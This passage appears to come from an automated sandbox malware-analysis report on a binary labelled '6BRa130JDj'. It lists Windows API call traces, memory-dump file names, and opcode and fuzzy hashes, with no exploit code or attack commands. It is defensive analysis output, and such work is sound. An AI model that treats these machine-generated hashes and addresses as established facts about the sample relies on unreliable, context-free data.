                                                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0030EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0030DCEC
                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0030EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0030DD12
                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0030EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0030DD46
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                    • String ID: cdecl
                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                    • Opcode ID: 5f0451df95a3390239e5c180b8b5dc3702e59c37fb395a586f357ee44e6a9347
                                                                                                                    • Instruction ID: 9b7d84bdf462dbcdc6a69e5093f62dbf70e7af3312b40643847d16c7b05a9890
                                                                                                                    • Opcode Fuzzy Hash: 5f0451df95a3390239e5c180b8b5dc3702e59c37fb395a586f357ee44e6a9347
                                                                                                                    • Instruction Fuzzy Hash: 2F11BE3A201305EFDB26AF74D895D7A77E9FF45310F80802AE806CB2A0EB719C50DB94
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 002E5101
                                                                                                                      • Part of subcall function 002D571C: __FF_MSGBANNER.LIBCMT ref: 002D5733
                                                                                                                      • Part of subcall function 002D571C: __NMSG_WRITE.LIBCMT ref: 002D573A
                                                                                                                      • Part of subcall function 002D571C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,00000000,?,?,?,002D0DD3,?), ref: 002D575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 485558fa34f47570ec434d44f6c67bd976ac9e26ba5e7830f54bd7e653f65ce7
                                                                                                                    • Instruction ID: 221d7203f30be872d065646e8e944e8139d0ee7e72d0db7dc5c06da1db8926c7
                                                                                                                    • Opcode Fuzzy Hash: 485558fa34f47570ec434d44f6c67bd976ac9e26ba5e7830f54bd7e653f65ce7
                                                                                                                    • Instruction Fuzzy Hash: 9911E372974A62AECB322F72EC45B5D37989F04369F50452BF94C9E250DE70CC609A90
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00317896,?,?,00000000), ref: 002B5A2C
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00317896,?,?,00000000,?,?), ref: 002B5A50
                                                                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00326399
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003263A4
                                                                                                                    • _memmove.LIBCMT ref: 003263D1
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 003263DC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1504782959-0
                                                                                                                    • Opcode ID: e11fcfc821ab034fff4a0fbbfcfddaf7d4b041d1e746500b5a65ba98c82744c0
                                                                                                                    • Instruction ID: fae325297be1a983f0d8779c0f41897664807bacc26a7cdb358f843fa0217fe9
                                                                                                                    • Opcode Fuzzy Hash: e11fcfc821ab034fff4a0fbbfcfddaf7d4b041d1e746500b5a65ba98c82744c0
                                                                                                                    • Instruction Fuzzy Hash: 15116031910119AFCB05FBA4DD86DEEB7B8AF09310F544065F506AB261DB30AE24CFA1
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00308B61
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00308B73
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00308B89
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00308BA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 512fd97af26cd64dc2359f210e33c8184127ffedc99b3c81cf0f0b7e3c0821a5
                                                                                                                    • Instruction ID: 8e8a767d83856798657dad1c2498d7eff441d46aca43743e9a8718d1f3e5a34b
                                                                                                                    • Opcode Fuzzy Hash: 512fd97af26cd64dc2359f210e33c8184127ffedc99b3c81cf0f0b7e3c0821a5
                                                                                                                    • Instruction Fuzzy Hash: 1F112A79901218FFEB11DFA5CD85FADBBB8FB48710F2040A5EA40B7290DA716E11DB94
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 002B12D8
                                                                                                                    • GetClientRect.USER32(?,?), ref: 002EB5FB
                                                                                                                    • GetCursorPos.USER32(?), ref: 002EB605
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002EB610
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: e6613e580b45560cffa1eb3ca37d722ae0de4cfc4b23564d5fb00aa4595b51d6
• Instruction ID: f867da672d5cbeddf91c291459405f150e501d5992a3c9d759f02c4531c4801c
• Opcode Fuzzy Hash: e6613e580b45560cffa1eb3ca37d722ae0de4cfc4b23564d5fb00aa4595b51d6
• Instruction Fuzzy Hash: 39116A35A20029EFCB15DF98C899DEE77B8EB05341F800456F901E7150C730BA618BA5
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0030D84D
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0030D864
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0030D879
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0030D897
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: c9335401b1d5a9b8ddcda065098fd44756b4bd520afcc003b5f11b21282a2cf5
• Instruction ID: 3068293eded064baca4a728742f1e7808d1f29053d1c585e8bd28711da10de75
• Opcode Fuzzy Hash: c9335401b1d5a9b8ddcda065098fd44756b4bd520afcc003b5f11b21282a2cf5
• Instruction Fuzzy Hash: 4D11A171A02304DFE3218F91ED48F93BBFCEB00B00F50C569A516C6480D7B0E508DBA1
APIs
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: 37a55529ed351dbcb7bdba684db331082670829f6af3815022254d9d53c40712
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: 88014C724A818ABBCF165F85CC05CEE3F66BB28395F988415FE1858031D236C9B1AF81
APIs
• GetWindowRect.USER32(?,?), ref: 0033B2E4
• ScreenToClient.USER32(?,?), ref: 0033B2FC
• ScreenToClient.USER32(?,?), ref: 0033B320
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0033B33B
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 46caf079084bb1b90a9254bf24cc1b27d13f939db43747f7437fca2ab71580eb
• Instruction ID: b3a00bd11965d9a244281978a8a86b09e789b9385ae32c211eb8b464233f6e59
• Opcode Fuzzy Hash: 46caf079084bb1b90a9254bf24cc1b27d13f939db43747f7437fca2ab71580eb
• Instruction Fuzzy Hash: 951143B9D00609EFDB41CFA9C8859EEFBB9FB08310F508166E914E3220D735AA558F50
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00316BE6
  • Part of subcall function 003176C4: _memset.LIBCMT ref: 003176F9
• _memmove.LIBCMT ref: 00316C09
• _memset.LIBCMT ref: 00316C16
• LeaveCriticalSection.KERNEL32(?), ref: 00316C26
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
• Opcode ID: 68d9d046eaace5241d4219e4ddec734d313abdbe7da63d9bab43a297efa3694b
• Instruction ID: 3fe709e5dd9d585e54c0821f5484d89fc21ee1b1dce03ea4e55748104e2a9eb8
• Opcode Fuzzy Hash: 68d9d046eaace5241d4219e4ddec734d313abdbe7da63d9bab43a297efa3694b
• Instruction Fuzzy Hash: C1F0543A100100ABCF066F55DCC5E8ABB29EF49320F088061FE089E267C771E851CBB4
APIs
• GetSysColor.USER32(00000008), ref: 002B2231
• SetTextColor.GDI32(?,000000FF), ref: 002B223B
• SetBkMode.GDI32(?,00000001), ref: 002B2250
• GetStockObject.GDI32(00000005), ref: 002B2258
• GetWindowDC.USER32(?,00000000), ref: 002EBE83
• GetPixel.GDI32(00000000,00000000,00000000), ref: 002EBE90
• GetPixel.GDI32(00000000,?,00000000), ref: 002EBEA9
• GetPixel.GDI32(00000000,00000000,?), ref: 002EBEC2
• GetPixel.GDI32(00000000,?,?), ref: 002EBEE2
• ReleaseDC.USER32(?,00000000), ref: 002EBEED
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: c844055125d1402d838961265bc3cbd241e63b138d2b0df60e2af51bc17699d7
• Instruction ID: efd9cb06918fdac9bf9ce41756e5c508b3a2197f5079bbba1cb1eed03a75cfcf
• Opcode Fuzzy Hash: c844055125d1402d838961265bc3cbd241e63b138d2b0df60e2af51bc17699d7
• Instruction Fuzzy Hash: 88E03031954245EEDF225F64FC4D7D83B14EB15332F448366FA69480E187714590DB11
APIs
• GetCurrentThread.KERNEL32 ref: 0030871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,003082E6), ref: 00308722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003082E6), ref: 0030872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,003082E6), ref: 00308736
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 27ffca1d965619e1a568e2b30ae27b0fa6c0f97e07b115baaba9d52f26aa1624
• Instruction ID: f5e4a1e367ae0d3a27a79276afebf36d0270fc40249ae21402b418213f7c3ff3
• Opcode Fuzzy Hash: 27ffca1d965619e1a568e2b30ae27b0fa6c0f97e07b115baaba9d52f26aa1624
• Instruction Fuzzy Hash: F1E08636A122119FD7215FB49D4CB573BACEF50B91F554828B2C5C9091DB348441C750
Strings
Similarity
• API ID:
• String ID: %4
• API String ID: 0-762753230
• Opcode ID: be3739095bd1d399410d330d81e6f69422a01a813b49ef6ec2ca3a710a118fd0
• Instruction ID: 3d02f00984564045611ebd9b6d01381caeb44dced5fde81cd9756c9b76ffb174
• Opcode Fuzzy Hash: be3739095bd1d399410d330d81e6f69422a01a813b49ef6ec2ca3a710a118fd0
• Instruction Fuzzy Hash: 88B12B71C2010ADBCF24EF94C489AFDB7B8FF44390F544166E905A7191DB789EA1CB51
APIs
Strings
Similarity
• API ID: __itow_s
• String ID: xb7$xb7
• API String ID: 3653519197-2383554142
• Opcode ID: c15cf06b45bee8e28d83594c1f726054db681ee9194abf8f5265653dbe846437
• Instruction ID: a6cbfc13b05add55d6296cf631575bad6894dc1a09883a3c62e09165fb7762a5
• Opcode Fuzzy Hash: c15cf06b45bee8e28d83594c1f726054db681ee9194abf8f5265653dbe846437
• Instruction Fuzzy Hash: 6FB17F70A00219EFCB25DF54D891EFABBB9FF58340F14845AF9459B252EB30E991CB60
APIs
  • Part of subcall function 002CFC86: _wcscpy.LIBCMT ref: 002CFCA9
  • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
  • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
• __wcsnicmp.LIBCMT ref: 0031B02D
                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0031B0F6
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                    • String ID: LPT
                                                                                                                    • API String ID: 3222508074-1350329615
                                                                                                                    • Opcode ID: f9f65fcc3db86934feea12cb5aa155a61b56e1ac9bae3d9177da95a52cc584d1
                                                                                                                    • Instruction ID: 10ef548da22d7f0332e416178a79a1609403cde75d35f8d3c69eeb4070b0a996
                                                                                                                    • Opcode Fuzzy Hash: f9f65fcc3db86934feea12cb5aa155a61b56e1ac9bae3d9177da95a52cc584d1
                                                                                                                    • Instruction Fuzzy Hash: A5617175A10215AFCB19DF94C891EEEF7B9EF0C310F118169F916AB2A1D770AE80CB50
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 002C2968
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 002C2981
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                    • Opcode ID: 7b554210f9803daa2cd3afbf75bb85f879f4897b5b5f2393c94f8e51b6e9739f
                                                                                                                    • Instruction ID: 55abe9ee8977310c2bd1f68ea015d6864306ed48c0aaf0be61af8ed83d0103ae
                                                                                                                    • Opcode Fuzzy Hash: 7b554210f9803daa2cd3afbf75bb85f879f4897b5b5f2393c94f8e51b6e9739f
                                                                                                                    • Instruction Fuzzy Hash: DA5134724287449BD320EF10D886BEBBBECFB85385F81885DF2D8410A1DB319579CB66
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4F0B: __fread_nolock.LIBCMT ref: 002B4F29
                                                                                                                    • _wcscmp.LIBCMT ref: 00319824
                                                                                                                    • _wcscmp.LIBCMT ref: 00319837
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                                                    • String ID: FILE
                                                                                                                    • API String ID: 4029003684-3121273764
                                                                                                                    • Opcode ID: 6a4edb2c2243d89e8d8ea38b3e15a108ddb302b8fd5ebb790160d2855bb0574c
                                                                                                                    • Instruction ID: 650c519a8f812517a6a7fc66caf9c644a83c41d8506bd9a12c5a56a3532882c3
                                                                                                                    • Opcode Fuzzy Hash: 6a4edb2c2243d89e8d8ea38b3e15a108ddb302b8fd5ebb790160d2855bb0574c
                                                                                                                    • Instruction Fuzzy Hash: C741D871A00209BADF25AFA0CC85FEFB7BDDF89750F01047AF904B7281DA71A9548B61
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID: Dd7$Dd7
                                                                                                                    • API String ID: 1473721057-1285796119
                                                                                                                    • Opcode ID: 2d5515199060b79896e45efb07429c091b7ed25f1b53f6a3577422397052c5c6
                                                                                                                    • Instruction ID: c6da1e9b1a6fe84f952e850753e3c589df07fad111cd0c983b5e509d6648d01a
                                                                                                                    • Opcode Fuzzy Hash: 2d5515199060b79896e45efb07429c091b7ed25f1b53f6a3577422397052c5c6
                                                                                                                    • Instruction Fuzzy Hash: 075105786283429FD764CF19C490A6ABBF1FB99394F54885DE9898B321D331EC91CF42
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0032259E
                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003225D4
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                    • String ID: |
                                                                                                                    • API String ID: 1413715105-2343686810
                                                                                                                    • Opcode ID: 4d983a563f2dcf962c6bf59ab88e8eb9d2491e9c2931a74f880b5d154f7952e5
                                                                                                                    • Instruction ID: 3d44386bae5ed88cc75c4fa9239a1f186cd123c23d1996a38b473b4befb34f58
                                                                                                                    • Opcode Fuzzy Hash: 4d983a563f2dcf962c6bf59ab88e8eb9d2491e9c2931a74f880b5d154f7952e5
                                                                                                                    • Instruction Fuzzy Hash: 0A31F671C10119EBDF01EFA1DC85EEEBFB9FF08350F140069E915A6162EA315966EFA0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00337B61
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00337B76
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: '
                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                    • Opcode ID: 4d1e2316733407a9a0140f27846724a066e86b0c9b8467fcc807688d433efe09
                                                                                                                    • Instruction ID: 6bddcbeeaa8f40c895dfcc01af6d16f1020e7bc6f9b14a198954727ab42e6ce9
                                                                                                                    • Opcode Fuzzy Hash: 4d1e2316733407a9a0140f27846724a066e86b0c9b8467fcc807688d433efe09
                                                                                                                    • Instruction Fuzzy Hash: 8941F8B4A0520AAFDB25CF64C9C1BDABBB9FB09300F15016AE909EB351D770A951CF90
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00336B17
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00336B53
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                    • Opcode ID: 19d1b62de3b20a077aa3c9bdbdec27883fac652e0d5cfd1e07e0b664816bf1e2
                                                                                                                    • Instruction ID: 7e1a5625b4a146e3dde4f74a0e17076d3b8f2ca5af851899af075aa9383428da
                                                                                                                    • Opcode Fuzzy Hash: 19d1b62de3b20a077aa3c9bdbdec27883fac652e0d5cfd1e07e0b664816bf1e2
                                                                                                                    • Instruction Fuzzy Hash: 74319E71210604AEEB129F65CC81BFBB3ADFF48760F11C619F9A9D7190DA30AC91CB60
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00312911
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0031294C
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                    • Opcode ID: 3012e317915f8ceb97a7fc4b0449ca20eca1a55b6657589f104053511be74e0e
                                                                                                                    • Instruction ID: 88cf994c4b17221eedc7ac216d3d8be20b8a06678827577ec29ec15c3d04c766
                                                                                                                    • Opcode Fuzzy Hash: 3012e317915f8ceb97a7fc4b0449ca20eca1a55b6657589f104053511be74e0e
                                                                                                                    • Instruction Fuzzy Hash: D531C331A003059FEB2ECF5CC885BEFBBB9EF49350F151029E985A61A0D77099B4CB51
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00336761
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0033676C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                    • Opcode ID: 968eb734cacb65802b7c54b6b91c0e793a4c6399a91a42dca09554608133b9df
                                                                                                                    • Instruction ID: a91e5cf3855e5d3881c5d4f58545375a82d88da44cd8645be5bd8b8746c9768c
                                                                                                                    • Opcode Fuzzy Hash: 968eb734cacb65802b7c54b6b91c0e793a4c6399a91a42dca09554608133b9df
                                                                                                                    • Instruction Fuzzy Hash: C011B271210208BFEF268F54CCC2EEB376EEB493A8F518129F91897290D671DC5187A0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B1D73
                                                                                                                      • Part of subcall function 002B1D35: GetStockObject.GDI32(00000011), ref: 002B1D87
                                                                                                                      • Part of subcall function 002B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B1D91
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00336C71
                                                                                                                    • GetSysColor.USER32(00000012), ref: 00336C8B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                    • Opcode ID: ecea4dc390c441b89b03c3facc7f048f3408199e5dcda03dd31f99b1afaf8953
                                                                                                                    • Instruction ID: 8ffce847a74aadcbf27ae5b27269da9301a91c39acccd977262e5e2c5534bc5a
                                                                                                                    • Opcode Fuzzy Hash: ecea4dc390c441b89b03c3facc7f048f3408199e5dcda03dd31f99b1afaf8953
                                                                                                                    • Instruction Fuzzy Hash: 28212C72910209AFDF05DFA8CC86EEA7BA8FB08314F015629F955D2250D735E850DB60
                                                                                                                    APIs
                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 003369A2
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003369B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: f9450eb33af22b0b2e9dab4b6fc6e1c659709b1fc34f383df6643e799559cfa3
                                                                                                                    • Instruction ID: 1c69237e56a22d30a166180cc9e380d19c902cb5dd3bf139aa22a754762d9f34
                                                                                                                    • Opcode Fuzzy Hash: f9450eb33af22b0b2e9dab4b6fc6e1c659709b1fc34f383df6643e799559cfa3
                                                                                                                    • Instruction Fuzzy Hash: 31118F71500108BFEB128E64DC86BEB376DEB06374F618724F9A5971E0C771DC909B60
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00312A22
                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00312A41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
